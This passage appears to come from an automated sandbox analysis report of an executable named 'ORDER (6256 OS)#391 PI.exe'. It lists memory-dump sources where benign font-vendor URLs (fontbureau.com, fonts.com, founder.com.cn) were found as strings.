Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comW.TTF0
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306630165.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306583635.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comals
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305405967.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305517979.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comalsq
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comd
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comd.
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309947315.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309780990.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311674086.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313163883.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309806910.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312483314.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313647928.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312816194.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314195867.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312692455.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313408101.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312978255.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311643593.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314379195.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.310304190.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311583708.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312951679.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.come.comQO
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305110962.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305148691.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305217303.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305176599.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305196320.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comedFB
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304419984.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comessedK
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309947315.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309780990.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309765831.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311674086.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349633653.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313163883.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309806910.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312483314.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313647928.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312816194.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314195867.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312692455.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313408101.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312978255.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311643593.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314379195.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.310304190.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311583708.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312951679.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comiona
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309947315.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309780990.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309765831.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311674086.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349633653.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313163883.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309806910.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312483314.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313647928.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312816194.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314195867.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312692455.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.313408101.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312978255.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311643593.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.314379195.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.310304190.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311583708.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.312951679.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.commB
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309947315.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309780990.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311674086.0000000005F19000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.309806910.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304149201.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311643593.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.310304190.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.311583708.0000000005F19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.como
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305517979.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comonyT
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comsivFf
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304149201.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comtalik
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304733777.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305110962.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305041614.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304757622.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305148691.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304920069.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304869319.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304797825.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304443149.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305176599.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305196320.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comto
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304178747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304498697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304711949.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304659358.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304523813.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304553639.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304203849.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304474473.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304315545.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304286522.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304627606.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304419984.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304682884.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304443149.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304228747.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304257902.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.304393632.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comtop/
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306418196.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306179537.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305459409.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306112026.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305947057.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305334059.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305363596.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305872051.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306630165.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305405967.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305302404.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305688249.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305902033.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305793816.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306146868.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306356978.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306084469.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305838697.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306295180.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.305649023.0000000005F18000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.306583635.0000000005F18000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fontbureau.comttod
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.fonts.com
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.300897558.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.300940819.0000000005F0A000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301936890.0000000005ED3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301420395.0000000005F0F000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301223897.0000000005F0F000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301313763.0000000005F10000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301537024.0000000005F10000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301391011.0000000005F09000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301444783.0000000005F0F000.00000004.00000800.00020000.00000000.sdmp, ORDER (6256 OS)#391 PI.exe, 00000000.00000003.301460866.0000000005F10000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/
Source: ORDER (6256 OS)#391 PI.exe, 00000000.00000002.349859716.00000000070E2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.founder.com.cn/cn/bThe
